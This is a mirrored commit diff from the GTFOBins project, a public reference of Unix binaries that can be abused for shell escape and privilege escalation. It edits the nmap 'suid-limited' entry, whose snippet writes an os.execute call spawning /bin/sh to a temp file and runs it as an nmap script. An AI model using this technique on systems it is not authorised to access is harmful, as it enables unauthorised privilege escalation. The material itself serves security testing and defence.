mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-01-08 00:21:34 +01:00
Fix nmap suid-limited
This commit is contained in:
parent
8fb329ca92
commit
e84ec807a1
@ -86,6 +86,6 @@ functions:
|
||||
- description: Input echo is disabled.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
echo 'os.execute("/bin/sh -p")' > $TF
|
||||
echo 'os.execute("/bin/sh")' > $TF
|
||||
./nmap --script=$TF
|
||||
---
|
||||
|
||||
Loading…
Reference in New Issue
Block a user